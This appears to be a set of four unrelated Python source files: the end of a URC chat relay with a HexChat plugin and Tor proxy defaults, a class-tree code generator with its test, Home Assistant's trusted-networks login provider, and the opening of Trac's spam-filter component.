self.urc_activity(src, cmd, dst, msg)
asyncio.async(self.forward_hub_packet(con, raw), loop=self.loop)
asyncio.async(self._get_hub_packet(con), loop=self.loop)
def get_log_lvl(lvl):
    """
    map a level name ('debug'/'info'/'warn'/'error', any case) to the
    matching logging constant, or None when unrecognized
    """
    return {
        'debug': logging.DEBUG,
        'info': logging.INFO,
        'warn': logging.WARN,
        'error': logging.ERROR,
    }.get(lvl.lower())
def urc_broadcast_hexchat(word, word_eol, userdata):
    """hexchat command hook: broadcast the typed line (word_eol[0]) as a
    PRIVMSG to the current channel via the URCD in *userdata*."""
    chnl = hexchat.get_info("channel")
    if chnl:
        nick = hexchat.get_info("nick")
        # fall back to 'anon' when hexchat has no nick set
        if nick is None or len(nick) == 0:
            nick = "anon"
        try:
            userdata.broadcast(':{}!hexchat@urc.py.tld PRIVMSG {} :{}\n'.format(nick, chnl, word_eol[0]))
        except Exception as e:
            prnt("error in urc: {}".format(e))
def urc_command_hexchat(word, word_eol, userdata):
    """hexchat '/urc' command hook: subcommands proxy / connect / msg /
    disconnect, operating on the URCD in *userdata*."""
    if len(word) < 2:
        prnt("invalid use of urc command")
        return hexchat.EAT_ALL
    cmd = word[1]
    if cmd == "proxy":
        if len(word) > 2:
            host = word[2]
            if len(word) > 3:
                try:
                    port = int(word[3])
                except ValueError:
                    prnt("invalid proxy port: {}".format(word[3]))
                    return hexchat.EAT_ALL
            # NOTE(review): when only a host is given (len(word) == 3),
            # `port` is unbound here and the lines below raise NameError
            prnt("set proxy to {}:{}".format(host, port))
            userdata.set_proxy(host, port)
    if cmd == "connect":
        host = ""
        port = 6789
        if len(word) > 2:
            host = word[2]
        if len(word) > 3:
            try:
                port = int(word[3])
            except ValueError:
                prnt("invalid port: {}".format(word[3]))
                return hexchat.EAT_ALL
        if len(host) > 0:
            userdata.connect_hub(host, port)
        else:
            prnt("cannot connect, no hub specificed")
        return hexchat.EAT_ALL
    elif cmd == "msg":
        # NOTE(review): word_eol[1:] still starts with "msg ...", so the
        # broadcast payload includes the subcommand itself — confirm intent
        urc_broadcast_hexchat(word[1:], word_eol[1:], userdata)
        return hexchat.EAT_ALL
    elif cmd == "disconnect":
        if len(word) == 2:
            # no argument: drop every hub
            userdata.disconnect()
        elif len(word) > 2:
            host = word[2]
            port = 6789
            if len(word) > 3:
                try:
                    port = int(word[3])
                except ValueError:
                    prnt("invalid port: {}".format(word[3]))
                    return hexchat.EAT_ALL
            userdata.disconnect_hub(host, port)
    return hexchat.EAT_ALL
def urc_unload_hexchat(userdata):
    """hexchat unload hook: tear down the URCD asyncio event loop."""
    try:
        # closing the loop stops all pending hub/irc coroutines
        userdata.loop.close()
    except Exception as e:
        # an unload hook must never raise into hexchat
        prnt("error unloading urc: {}".format(e))
# Plugin-mode initialization: only runs when this file was imported inside
# hexchat (the `hexchat` module import succeeded earlier in the file).
if hexchat:
    urcd = URCD(False, 'hexchat', False, False)
    urcd.gui = hexchat
    # presumably the Tor Browser socks port -- TODO confirm this default
    urcd.set_proxy("127.0.0.1", 9150)
    # empty command name hooks typed input lines; 'urc' handles /urc ...
    hexchat.hook_command('', urc_broadcast_hexchat, urcd)
    hexchat.hook_command('urc', urc_command_hexchat, urcd)
    hexchat.hook_unload(urc_unload_hexchat, urcd)
    def runhub(urc):
        """Run the URCD event loop; used as a background-thread target
        because hexchat owns the main thread."""
        prnt("starting up URC HUB")
        urc.loop = asyncio.new_event_loop()
        try:
            urc.start()
            urc.loop.run_forever()
        except Exception as e:
            prnt("error in urc mainloop: {}".format(e))
    threading.Thread(target=runhub, args=(urcd,)).start()
def main():
    """
    Command line entry point: parse arguments, wire up a URCD instance
    (irc listener, hub listener, outbound hub links) and run its event
    loop until interrupted.
    """
    import argparse
    ap = argparse.ArgumentParser()
    ap.add_argument('--log', type=str, default='warn')
    ap.add_argument('--irc', type=str, default='127.0.0.1')
    ap.add_argument('--irc-port', type=int, default=6667)
    ap.add_argument('--no-socks', action='store_const', const=True, default=False)
    ap.add_argument('--socks-host', type=str, default='127.0.0.1')
    # BUG FIX: this was declared type=str with an int default, so a
    # user-supplied port arrived as a string while the default stayed an int.
    ap.add_argument('--socks-port', type=int, default=9150)
    ap.add_argument('--remote-hub', type=str, default='allyour4nert7pkh.onion')
    ap.add_argument('--remote-hub-port', type=int, default=6789)
    ap.add_argument('--hubs-file', type=str, default=None)
    ap.add_argument('--hub', type=str, default='127.0.0.1')
    ap.add_argument('--hub-port', type=int, default=6789)
    ap.add_argument('--sign', type=str, default='no')
    ap.add_argument('--name', type=str, default='urc.py')
    ap.add_argument('--no-anon', action='store_const', const=True, default=False)
    # NOTE(review): --ircd-config is parsed but never used below -- confirm
    # whether it should be forwarded to URCD.
    ap.add_argument('--ircd-config', type=str, default=None)
    args = ap.parse_args()
    # unrecognised level names fall back to WARN
    loglvl = get_log_lvl(args.log) or logging.WARN
    logging.basicConfig(level=loglvl, format='%(asctime)s [%(levelname)s] %(name)s : %(message)s')
    urcd = URCD(sign=args.sign.lower() == 'yes', name=args.name)
    urcd.use_socks = not args.no_socks
    if urcd.use_socks:
        urcd.socks_host = args.socks_host
        urcd.socks_port = args.socks_port
    try:
        urcd.bind_ircd(args.irc, args.irc_port)
        if args.no_anon:
            urcd.ircd.anon = False
        urcd.connect_hub(args.remote_hub, args.remote_hub_port)
        if args.hub:
            urcd.bind_hub(args.hub, args.hub_port)
        if args.hubs_file:
            # one "host[:port]" entry per line; blank lines and lines
            # starting with '#' are skipped
            with open(args.hubs_file) as f:
                for line in f:
                    line = line.replace(' ', '').replace('\n', '').replace('\r', '')
                    if len(line) == 0 or line[0] == '#':
                        continue
                    parts = line.split(':')
                    host = parts[0]
                    port = 6789
                    if len(parts) == 2:
                        port = int(parts[1])
                    urcd.connect_hub(host, port)
        urcd.start()
        urcd.loop.run_forever()
    finally:
        urcd.loop.close()
if __name__ == '__main__':
    # When loaded inside hexchat the hooks registered above drive everything,
    # so there is nothing to do here; standalone invocation runs the command
    # line entry point instead.
    if hexchat:
        pass
    else:
        main()
|
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Usage example::
>>> from angora.baseclass.classtree import gencode
>>> gencode(data, "example.py")
"""
from __future__ import print_function
import datetime
import sys
import os
# Relative import works when loaded as part of the package; fall back to an
# absolute import when this module is executed as a plain script.
try:
    from . import nameddict
except SystemError:
    from angora.baseclass import nameddict
# Python 2/3 compatibility: the tuples of string-like and integer-like types
# used for isinstance() checks below.
if sys.version_info[0] == 3:
    _str_type = str
    _int_type = (int,)
else:
    _str_type = basestring
    _int_type = (int, long)
class Base(nameddict.Base):
    """
    Base class for generated class-tree nodes.

    Child instances are attached under index attributes named
    ``<key>____<value>`` so that ``instance.getattr_by_<key>(value)`` can
    look children up by any indexable metadata field; plain attributes
    (no ``____``) are the node's own metadata.
    """
    def _getattr_by_key_value(self, key):
        """Return a lookup function ``value -> self.<key>____<value>``."""
        def getattr_by_key_value(value):
            return getattr(self, "%s____%s" % (key, value))
        return getattr_by_key_value
    def __getattr__(self, attr):
        # dynamic dispatch: `getattr_by_<key>` resolves to an index lookup,
        # everything else goes through the normal attribute machinery
        if attr.startswith("getattr_by_"):
            key = attr.replace("getattr_by_", "")
            return self._getattr_by_key_value(key)
        else:
            return object.__getattribute__(self, attr)
    def keys(self):
        """Sorted metadata attribute names (index attributes excluded)."""
        return [key for key, value in self.items()]
    def values(self):
        """Metadata attribute values, ordered to match :meth:`keys`."""
        return [value for key, value in self.items()]
    def items(self):
        """Sorted ``(attr, value)`` pairs, skipping ``____`` index attrs."""
        items = list()
        for attr, value in self.__dict__.items():
            if "____" not in attr:
                items.append((attr, value))
        return sorted(items, key=lambda x: x[0])
    def to_dict(self):
        """Return the raw attribute dict (index attributes included)."""
        return self.__dict__
    def serialize(self):
        """
        Recursively dump this node to a plain dict with keys ``classname``,
        ``metadata`` and (when children exist) ``subclass``.

        BUG FIX: this previously iterated ``self.items()``, which already
        filters out the ``____`` index attributes, so the child-collecting
        branch was dead code and ``subclass`` was never emitted.  Iterate
        the raw ``__dict__`` (sorted for deterministic output) instead.
        """
        d = {"classname": self.__class__.__name__, "metadata": dict()}
        uuid_set = set()
        for attr, value in sorted(self.__dict__.items(), key=lambda x: x[0]):
            if "____" not in attr:
                d["metadata"][attr] = value
            else:
                # children are indexed under several attributes; dedupe by id
                _id = id(value)
                if _id not in uuid_set:
                    d.setdefault("subclass", []).append(value.serialize())
                    uuid_set.add(_id)
        return d
class CodeGenerator(object):
    """Worker class: renders class-tree data dicts into Python source code.

    Call order: :meth:`pre_process` (collect metadata attribute names per
    classname), :meth:`sort_metadata`, then :meth:`repr_class_data`; the
    rendered script is available from :attr:`code`.
    """
    # Lines every generated module starts with.  Previously duplicated
    # verbatim in both __init__ and reset(); kept in one place now.
    _HEADER = [
        "#!/usr/bin/env python",
        "# -*- coding: utf-8 -*-",
        "",
        "import datetime",
        "from angora.baseclass import classtree",
    ]
    def __init__(self, tab=" ", indent=0):
        """
        :param tab: string used for one indentation level
        :param indent: global indent applied to every emitted line
        """
        self.Tab = tab
        self.Tab2 = tab * 2
        self.indent = indent
        self.basename = "classtree.Base"
        self.reset()
    def reset(self):
        """Clear all collected state so the generator can be reused."""
        # classname -> set (later sorted list) of metadata attribute names
        self._classes = dict()
        # classnames whose `class ...:` definition was already emitted
        self.classes = set()
        self.lines = list(self._HEADER)
    def pre_process(self, class_data):
        """Recursively collect metadata attribute names per classname.

        NOTE: each visit resets the set for that classname, so for repeated
        classnames the last-visited node's keys win.
        """
        classname = self.formatted_classname(class_data["classname"])
        self._classes[classname] = set()
        for key in class_data.get("metadata", dict()):
            self._classes[classname].add(key)
        for subclass_data in class_data.get("subclass", list()):
            self.pre_process(subclass_data)
    def sort_metadata(self):
        """Freeze each collected attribute set into a sorted list."""
        for k, v in self._classes.items():
            self._classes[k] = list(v)
            self._classes[k].sort()
    @property
    def code(self):
        """The generated script as a single string."""
        return "\n".join([self.Tab * self.indent + line for line in self.lines])
    def formatted_classname(self, text):
        """Upper-case the first character: ``person -> Person``."""
        return text[0].upper() + text[1:]
    def formatted_instancename(self, text):
        """Lower-case the first character: ``Person -> person``."""
        return text[0].lower() + text[1:]
    def sorted_dict(self, d):
        """Return ``d.items()`` sorted by key, ascending."""
        return sorted(d.items(), key=lambda x: x[0], reverse=False)
    def repr_def_class(self, class_data):
        """Emit the class definition (once per classname)::
            class Person(Base):
                def __init__(self, person_id=None, name=None):
                    self.person_id = person_id
                    self.name = name
        """
        classname = self.formatted_classname(class_data["classname"])
        if classname not in self.classes:
            self.lines.append("")
            self.lines.append("class %s(%s):" % (classname, self.basename))
            kwargs = list()
            setattr_arguments = list()
            for attr in self._classes[classname]:
                kwargs.append("%s=None" % attr)
                setattr_arguments.append(
                    self.Tab2 + "self.%s = %s" % (attr, attr))
            if len(kwargs):
                line = self.Tab + "def __init__(self, %s):" % ", ".join(kwargs)
            else:
                line = self.Tab + "def __init__(self):"
            self.lines.append(line)
            for setattr_argument in setattr_arguments:
                self.lines.append(setattr_argument)
            if len(setattr_arguments):
                self.lines.append("")
            self.classes.add(classname)
    def repr_new_instance(self, class_data):
        """Render an instantiation line::
            person = Person(name='Jack', person_id=1)
        """
        classname = self.formatted_classname(class_data["classname"])
        instancename = self.formatted_instancename(class_data["classname"])
        arguments = list()
        for key, value in self.sorted_dict(class_data.get("metadata", dict())):
            arguments.append("%s=%r" % (key, value))
        return "%s = %s(%s)" % (
            instancename, classname, ", ".join(arguments))
    def repr_setattr(self, class_data):
        """Emit child instantiations plus their ``____`` index attributes::
            person = Person(name='Jack', person_id=1)
            self.name____Jack = person
            self.person_id____1 = person
        """
        def get_indexable_attributes(class_data):
            # an attribute is indexable when its value survives embedding
            # in an attribute name: ints, or strings free of punctuation
            def isvalid(text):
                for char in r"""~`!#%^&*()+=[]{}|\:;"'/.,<> """:
                    if char in text:
                        return False
                return True
            indexable_attributes = list()
            for key, value in class_data.get("metadata", dict()).items():
                if isinstance(value, _int_type):
                    indexable_attributes.append(key)
                elif isinstance(value, _str_type):
                    if isvalid(value):
                        indexable_attributes.append(key)
            return indexable_attributes
        if "subclass" in class_data:
            for subclass_data in class_data["subclass"]:
                instancename = self.formatted_instancename(subclass_data["classname"])
                self.lines.append(self.Tab2 + self.repr_new_instance(subclass_data))
                indexable_attributes = get_indexable_attributes(subclass_data)
                for key, value in self.sorted_dict(subclass_data.get("metadata", dict())):
                    if key in indexable_attributes:
                        if isinstance(value, _int_type):
                            if value < 0:
                                # '-' is illegal in identifiers: spell as neg<N>
                                self.lines.append(self.Tab2 + "self.%s____neg%s = %s" % (
                                    key, -value, instancename))
                            else:
                                self.lines.append(self.Tab2 + "self.%s____%s = %s" % (
                                    key, value, instancename))
                        else:
                            self.lines.append(self.Tab2 + "self.%s____%s = %s" % (
                                key, value, instancename))
                self.lines.append(self.Tab2)
    def repr_class_data(self, class_data):
        """Render a whole subtree: children's class definitions first
        (depth-first), then this node's definition and index attributes.
        """
        if "subclass" in class_data:
            for subclass_data in class_data["subclass"]:
                self.repr_class_data(subclass_data)
        self.repr_def_class(class_data)
        self.repr_setattr(class_data)
def gencode(data, output=None, tab=" ", indent=0, overwrite=False):
    """Generate code.

    :param data: one class data dict, or a list of class data dicts; each
        dict has keys ``classname``, ``metadata`` and optionally
        ``subclass`` (a list of nested class data dicts), e.g.::

            data = {
                "classname": "PersonCollection",
                "metadata": {"collection_id": 1, "name": "Person"},
                "subclass": [
                    {"classname": "Person",
                     "metadata": {"person_id": 1, "name": "Jack"}},
                ],
            }

    :param output: default None, the python script file name you want to
        create; when None the generated code is printed instead
    :param tab: string used for one indentation level
    :param indent: global indent setting
    :param overwrite: if True, silently overwrite the output file
    :raises FileExistsError: when `output` exists and `overwrite` is False
        (note: FileExistsError is Python 3 only)
    """
    codegen = CodeGenerator(tab=tab, indent=indent)
    if isinstance(data, list):
        for class_data in data:
            codegen.pre_process(class_data)
            codegen.sort_metadata()
            codegen.repr_class_data(class_data)
        for class_data in data:
            codegen.lines.append("")
            codegen.lines.append("%s" % codegen.repr_new_instance(class_data))
    elif isinstance(data, dict):
        codegen.pre_process(data)
        # BUG FIX: sort_metadata() was only called on the list path, so a
        # single dict produced __init__ signatures in arbitrary set order.
        codegen.sort_metadata()
        codegen.repr_class_data(data)
        codegen.lines.append("")
        codegen.lines.append("%s" % codegen.repr_new_instance(data))
    if output:
        if not overwrite:
            if os.path.exists(output):
                raise FileExistsError("%r" % output)
        with open(output, "wb") as f:
            f.write(codegen.code.encode("utf-8"))
    else:
        print(codegen.code)
if __name__ == "__main__":
    import unittest
    from pprint import pprint as ppt
    # sample class-tree: a Database holding two collections, each with two
    # leaf records
    data = [
        {
            "classname": "Database",
            "metadata": {"db_id": 1, "name": "Database"},
            "subclass": [
                {
                    "classname": "PersonCollection",
                    "metadata": {"collection_id": 1, "name": "Person", "create_date": datetime.date(2016, 1, 8)},
                    "subclass": [
                        {
                            "classname": "Person",
                            "metadata": {"person_id": 1, "name": "Jack"},
                        },
                        {
                            "classname": "Person",
                            "metadata": {"person_id": 2, "name": "Paul"},
                        },
                    ],
                },
                {
                    "classname": "DepartmentCollection",
                    "metadata": {"collection_id": 2, "name": "Department", "create_date": datetime.date(2016, 1, 1)},
                    "subclass": [
                        {
                            "classname": "Department",
                            "metadata": {"department_id": 1, "name": "IT"},
                        },
                        {
                            "classname": "Department",
                            "metadata": {"department_id": 2, "name": "HR"},
                        },
                    ]
                },
            ],
        },
    ]
    # print the generated code for the PersonCollection subtree
    gencode(data[0]["subclass"][0], indent=0, overwrite=True)
    class Unittest(unittest.TestCase):
        def test_all(self):
            # The block below is gencode() output pasted back in by hand.
            # NOTE(review): the `self.<key>____<value> = ...` lines sit at
            # class-body level here, where `self` is undefined -- the paste
            # appears mis-indented relative to the generator's own output;
            # confirm before enabling the commented assertions below.
            #!/usr/bin/env python
            # -*- coding: utf-8 -*-
            import datetime
            from angora.baseclass import classtree
            class Person(classtree.Base):
                def __init__(self, name=None, person_id=None):
                    self.name = name
                    self.person_id = person_id
            class PersonCollection(classtree.Base):
                def __init__(self, collection_id=None, create_date=None, name=None):
                    self.collection_id = collection_id
                    self.create_date = create_date
                    self.name = name
                person = Person(name='Jack', person_id=1)
                self.name____Jack = person
                self.person_id____1 = person
                person = Person(name='Paul', person_id=2)
                self.name____Paul = person
                self.person_id____2 = person
            class Department(classtree.Base):
                def __init__(self, department_id=None, name=None):
                    self.department_id = department_id
                    self.name = name
            class DepartmentCollection(classtree.Base):
                def __init__(self, collection_id=None, create_date=None, name=None):
                    self.collection_id = collection_id
                    self.create_date = create_date
                    self.name = name
                department = Department(department_id=1, name='IT')
                self.department_id____1 = department
                self.name____IT = department
                department = Department(department_id=2, name='HR')
                self.department_id____2 = department
                self.name____HR = department
            class Database(classtree.Base):
                def __init__(self, db_id=None, name=None):
                    self.db_id = db_id
                    self.name = name
                personCollection = PersonCollection(collection_id=1, create_date=datetime.date(2016, 1, 8), name='Person')
                self.collection_id____1 = personCollection
                self.name____Person = personCollection
                departmentCollection = DepartmentCollection(collection_id=2, create_date=datetime.date(2016, 1, 1), name='Department')
                self.collection_id____2 = departmentCollection
                self.name____Department = departmentCollection
            database = Database(db_id=1, name='Database')
            # ppt(database.serialize())
            # Test IDLE auto-complete support
            # self.assertEqual(database.collection_id____1.collection_id, 1)
            # self.assertEqual(database.collection_id____2.collection_id, 2)
            # self.assertEqual(database.name____Person.name, "Person")
            # self.assertEqual(database.name____Department.name, "Department")
            #
            # self.assertEqual(database.collection_id____1.person_id____1.person_id, 1)
            # self.assertEqual(database.collection_id____1.person_id____2.person_id, 2)
            # self.assertEqual(database.collection_id____1.name____Jack.name, "Jack")
            # self.assertEqual(database.collection_id____1.name____Paul.name, "Paul")
            #
            # # Test getattr_by method
            # self.assertEqual(database.getattr_by_collection_id(1).collection_id, 1)
            # self.assertEqual(database.getattr_by_name("Person").name, "Person")
    unittest.main()
|
|
"""Trusted Networks auth provider.
It shows a list of users if the access comes from a trusted network.
The login flow is aborted if the access is not from a trusted network.
"""
from __future__ import annotations
from collections.abc import Mapping
from ipaddress import (
IPv4Address,
IPv4Network,
IPv6Address,
IPv6Network,
ip_address,
ip_network,
)
from typing import Any, Dict, List, Union, cast
import voluptuous as vol
from homeassistant.core import callback
from homeassistant.data_entry_flow import FlowResult
from homeassistant.exceptions import HomeAssistantError
import homeassistant.helpers.config_validation as cv
from . import AUTH_PROVIDER_SCHEMA, AUTH_PROVIDERS, AuthProvider, LoginFlow
from .. import InvalidAuthError
from ..models import Credentials, RefreshToken, UserMeta
# mypy: disallow-any-generics
IPAddress = Union[IPv4Address, IPv6Address]
IPNetwork = Union[IPv4Network, IPv6Network]
# configuration keys understood by this auth provider
CONF_TRUSTED_NETWORKS = "trusted_networks"
CONF_TRUSTED_USERS = "trusted_users"
CONF_GROUP = "group"
CONF_ALLOW_BYPASS_LOGIN = "allow_bypass_login"
CONFIG_SCHEMA = AUTH_PROVIDER_SCHEMA.extend(
    {
        # at least the list of trusted networks/CIDRs is required
        vol.Required(CONF_TRUSTED_NETWORKS): vol.All(cv.ensure_list, [ip_network]),
        vol.Optional(CONF_TRUSTED_USERS, default={}): vol.Schema(
            # we only validate the format of user_id or group_id
            {
                ip_network: vol.All(
                    cv.ensure_list,
                    [
                        vol.Or(
                            cv.uuid4_hex,
                            vol.Schema({vol.Required(CONF_GROUP): cv.uuid4_hex}),
                        )
                    ],
                )
            }
        ),
        # when True and exactly one user matches, login skips the form
        vol.Optional(CONF_ALLOW_BYPASS_LOGIN, default=False): cv.boolean,
    },
    extra=vol.PREVENT_EXTRA,
)
class InvalidUserError(HomeAssistantError):
    """Raised when trying to log in as an unknown, inactive or system user."""
@AUTH_PROVIDERS.register("trusted_networks")
class TrustedNetworksAuthProvider(AuthProvider):
    """Trusted Networks auth provider.
    Allow passwordless access from trusted network.
    """
    DEFAULT_TITLE = "Trusted Networks"
    @property
    def trusted_networks(self) -> list[IPNetwork]:
        """Return trusted networks."""
        return cast(List[IPNetwork], self.config[CONF_TRUSTED_NETWORKS])
    @property
    def trusted_users(self) -> dict[IPNetwork, Any]:
        """Return trusted users per network."""
        return cast(Dict[IPNetwork, Any], self.config[CONF_TRUSTED_USERS])
    @property
    def trusted_proxies(self) -> list[IPNetwork]:
        """Return trusted proxies in the system."""
        # http component may not be set up (yet); treat as "no proxies"
        if not self.hass.http:
            return []
        return [
            ip_network(trusted_proxy)
            for trusted_proxy in self.hass.http.trusted_proxies
        ]
    @property
    def support_mfa(self) -> bool:
        """Trusted Networks auth provider does not support MFA."""
        return False
    async def async_login_flow(self, context: dict[str, Any] | None) -> LoginFlow:
        """Return a flow to login."""
        assert context is not None
        ip_addr = cast(IPAddress, context.get("ip_address"))
        users = await self.store.async_get_users()
        # system-generated and inactive users are never offered
        available_users = [
            user for user in users if not user.system_generated and user.is_active
        ]
        # narrow the candidates using the first trusted_users entry whose
        # network contains the requesting address
        for ip_net, user_or_group_list in self.trusted_users.items():
            if ip_addr not in ip_net:
                continue
            user_list = [
                user_id for user_id in user_or_group_list if isinstance(user_id, str)
            ]
            group_list = [
                group[CONF_GROUP]
                for group in user_or_group_list
                if isinstance(group, dict)
            ]
            # NOTE(review): under CONFIG_SCHEMA above, each group_list item
            # looks like a single group-id string, so this flattens them into
            # individual characters -- confirm whether CONF_GROUP is meant to
            # hold a list of ids instead.
            flattened_group_list = [
                group for sublist in group_list for group in sublist
            ]
            available_users = [
                user
                for user in available_users
                if (
                    user.id in user_list
                    or any(group.id in flattened_group_list for group in user.groups)
                )
            ]
            break
        return TrustedNetworksLoginFlow(
            self,
            ip_addr,
            {user.id: user.name for user in available_users},
            self.config[CONF_ALLOW_BYPASS_LOGIN],
        )
    async def async_get_or_create_credentials(
        self, flow_result: Mapping[str, str]
    ) -> Credentials:
        """Get credentials based on the flow result."""
        user_id = flow_result["user"]
        users = await self.store.async_get_users()
        for user in users:
            if user.id != user_id:
                continue
            if user.system_generated:
                continue
            if not user.is_active:
                continue
            # reuse an existing credential for this user when one exists
            for credential in await self.async_credentials():
                if credential.data["user_id"] == user_id:
                    return credential
            cred = self.async_create_credentials({"user_id": user_id})
            await self.store.async_link_user(user, cred)
            return cred
        # We only allow login as exist user
        raise InvalidUserError
    async def async_user_meta_for_credentials(
        self, credentials: Credentials
    ) -> UserMeta:
        """Return extra user metadata for credentials.
        Trusted network auth provider should never create new user.
        """
        raise NotImplementedError
    @callback
    def async_validate_access(self, ip_addr: IPAddress) -> None:
        """Make sure the access from trusted networks.
        Raise InvalidAuthError if not.
        Raise InvalidAuthError if trusted_networks is not configured.
        """
        if not self.trusted_networks:
            raise InvalidAuthError("trusted_networks is not configured")
        if not any(
            ip_addr in trusted_network for trusted_network in self.trusted_networks
        ):
            raise InvalidAuthError("Not in trusted_networks")
        # a proxy's own address must never be treated as a trusted client
        if any(ip_addr in trusted_proxy for trusted_proxy in self.trusted_proxies):
            raise InvalidAuthError("Can't allow access from a proxy server")
    @callback
    def async_validate_refresh_token(
        self, refresh_token: RefreshToken, remote_ip: str | None = None
    ) -> None:
        """Verify a refresh token is still valid."""
        if remote_ip is None:
            raise InvalidAuthError(
                "Unknown remote ip can't be used for trusted network provider."
            )
        self.async_validate_access(ip_address(remote_ip))
class TrustedNetworksLoginFlow(LoginFlow):
    """Handler for the login flow."""
    def __init__(
        self,
        auth_provider: TrustedNetworksAuthProvider,
        ip_addr: IPAddress,
        available_users: dict[str, str | None],
        allow_bypass_login: bool,
    ) -> None:
        """Initialize the login flow."""
        super().__init__(auth_provider)
        # user_id -> display name of every user the caller may log in as
        self._available_users = available_users
        self._ip_address = ip_addr
        self._allow_bypass_login = allow_bypass_login
    async def async_step_init(
        self, user_input: dict[str, str] | None = None
    ) -> FlowResult:
        """Handle the step of the form."""
        # re-validate network access on every step; abort instead of erroring
        try:
            cast(
                TrustedNetworksAuthProvider, self._auth_provider
            ).async_validate_access(self._ip_address)
        except InvalidAuthError:
            return self.async_abort(reason="not_allowed")
        if user_input is not None:
            return await self.async_finish(user_input)
        # skip the form entirely when bypass is on and the choice is unambiguous
        if self._allow_bypass_login and len(self._available_users) == 1:
            return await self.async_finish(
                {"user": next(iter(self._available_users.keys()))}
            )
        return self.async_show_form(
            step_id="init",
            data_schema=vol.Schema(
                {vol.Required("user"): vol.In(self._available_users)}
            ),
        )
|
|
# -*- coding: utf-8 -*-
#
# Copyright (C) 2005-2012 Edgewall Software
# Copyright (C) 2005-2006 Matthew Good <trac@matt-good.net>
# Copyright (C) 2006 Christopher Lenz <cmlenz@gmx.de>
# All rights reserved.
#
# This software is licensed as described in the file COPYING, which
# you should have received as part of this distribution. The terms
# are also available at http://trac.edgewall.com/license.html.
#
# This software consists of voluntary contributions made by many
# individuals. For the exact contribution history, see the revision
# history and logs, available at http://projects.edgewall.com/trac/.
#
# Author: Matthew Good <trac@matt-good.net>
# Christopher Lenz <cmlenz@gmx.de>
import time
from StringIO import StringIO
from difflib import SequenceMatcher
from pkg_resources import resource_filename
from trac.config import BoolOption, ConfigSection, ExtensionOption, IntOption
from trac.core import Component, ExtensionPoint, implements
from trac.db import DatabaseManager
from trac.env import IEnvironmentSetupParticipant, ISystemInfoProvider
from trac.perm import IPermissionRequestor
from trac.util import get_pkginfo, as_int
from trac.util.html import tag
from trac.util.text import shorten_line, to_unicode
from trac.web.api import Request
from tracspamfilter.api import (
IFilterStrategy, IRejectHandler, RejectContent,
_, N_, add_domain, get_strategy_name, gettext, tag_)
from tracspamfilter.filters.trapfield import TrapFieldFilterStrategy
from tracspamfilter.model import LogEntry, Statistics, schema, \
schema_version, schema_version_name
class FilterSystem(Component):
    """The central component for spam filtering. Must be enabled always to allow
    filtering of spam.
    """
    # all registered karma-scoring strategies (internal and external services)
    strategies = ExtensionPoint(IFilterStrategy)
    implements(IEnvironmentSetupParticipant, IPermissionRequestor,
               IRejectHandler, ISystemInfoProvider)
    # --- karma weights and thresholds ---
    min_karma = IntOption('spam-filter', 'min_karma', '0',
        """The minimum score required for a submission to be allowed.""",
        doc_domain='tracspamfilter')
    authenticated_karma = IntOption('spam-filter', 'authenticated_karma', '20',
        """The karma given to authenticated users, in case
        `trust_authenticated` is false.""", doc_domain='tracspamfilter')
    # --- logging of submissions ---
    logging_enabled = BoolOption('spam-filter', 'logging_enabled', 'true',
        """Whether all content submissions and spam filtering activity should
        be logged to the database.""", doc_domain='tracspamfilter')
    nolog_obvious = BoolOption('spam-filter', 'nolog_obvious', 'false',
        """Don't log obvious spam (Bayes >90%%, marked as spam and not
        authenticated) to the database.""", doc_domain='tracspamfilter')
    purge_age = IntOption('spam-filter', 'purge_age', '7',
        """The number of days after which log entries should be purged.""",
        doc_domain='tracspamfilter')
    # --- external (network) filter services ---
    use_external = BoolOption('spam-filter', 'use_external', 'true',
        """Allow usage of external services.""", doc_domain='tracspamfilter')
    skip_external = IntOption('spam-filter', 'skip_external', '20',
        """Skip external calls when this negative karma is already reached
        by internal tests.""", doc_domain='tracspamfilter')
    skip_externalham = IntOption('spam-filter', 'skip_externalham', '30',
        """Skip external calls when this positive karma is already reached
        by internal tests.""", doc_domain='tracspamfilter')
    stop_external = IntOption('spam-filter', 'stop_external', '50',
        """Stop external calls when this negative karma is reached.""",
        doc_domain='tracspamfilter')
    stop_externalham = IntOption('spam-filter', 'stop_externalham', '50',
        """Stop external calls when this positive karma is reached.""",
        doc_domain='tracspamfilter')
    train_external = BoolOption('spam-filter', 'train_external', 'true',
        """Allow training of external services.""", doc_domain='tracspamfilter')
    trust_authenticated = BoolOption('spam-filter', 'trust_authenticated',
        'false',
        """Whether content submissions by authenticated users should be trusted
        without checking for potential spam or other abuse.""",
        doc_domain='tracspamfilter')
    attachment_karma = IntOption('spam-filter', 'attachment_karma', '0',
        """The karma given to attachments.""", doc_domain='tracspamfilter')
    register_karma = IntOption('spam-filter', 'register_karma', '0',
        """The karma given to registrations.""", doc_domain='tracspamfilter')
    reject_handler = ExtensionOption('spam-filter', 'reject_handler',
        IRejectHandler, 'FilterSystem',
        """The handler used to reject content.""", doc_domain='tracspamfilter')
    isforwarded = BoolOption('spam-filter', 'is_forwarded', 'false',
        """Interpret X-Forwarded-For header for IP checks.""",
        doc_domain='tracspamfilter')
    spam_section = ConfigSection('spam-filter',
        """This section is used to handle all configurations used by
        spam filter plugin.""", doc_domain='tracspamfilter')
    def __init__(self):
        """Set up translation domain"""
        try:
            locale_dir = resource_filename(__name__, 'locale')
        except KeyError:
            # package ships without bundled locale data; run untranslated
            pass
        else:
            add_domain(self.env.path, locale_dir)
# IRejectHandler methods
    def reject_content(self, req, message):
        """IRejectHandler default implementation: abort the request by
        raising RejectContent with the given rejection message markup."""
        raise RejectContent(message)
# Public methods
    def test(self, req, author, changes):
        """Test a submission against the registered filter strategies.
        The submission is rejected (via the configured reject handler,
        which raises) when the accumulated karma score ends up below
        `min_karma`; otherwise the method returns normally.
        @param req: the request object
        @param author: the name of the logged in user, or 'anonymous' if the
            user is not logged in
        @param changes: a list of `(old_content, new_content)` tuples for every
            modified "field", where `old_content` may contain the previous
            version of that field (if available), and `new_content` contains
            the newly submitted content
        """
        start = time.time()
        ip = req.remote_addr
        if self.isforwarded:
            # honor X-Forwarded-For only when explicitly configured; the
            # first entry is the originating client
            x_forwarded = req.get_header('X-Forwarded-For')
            if x_forwarded and x_forwarded != '':
                ip = x_forwarded.split(',',1)[0]
        if author.find("@") < 1:
            # fold the honeypot ("trap") field into the tested data: an
            # email-looking value is appended to the author, anything else
            # is appended to the content changes
            trap = TrapFieldFilterStrategy(self.env).get_trap(req)
            if trap:
                if trap.find("@") > 0:
                    author += " <%s>" % trap
                else:
                    self.log.debug("Append trap field to changes")
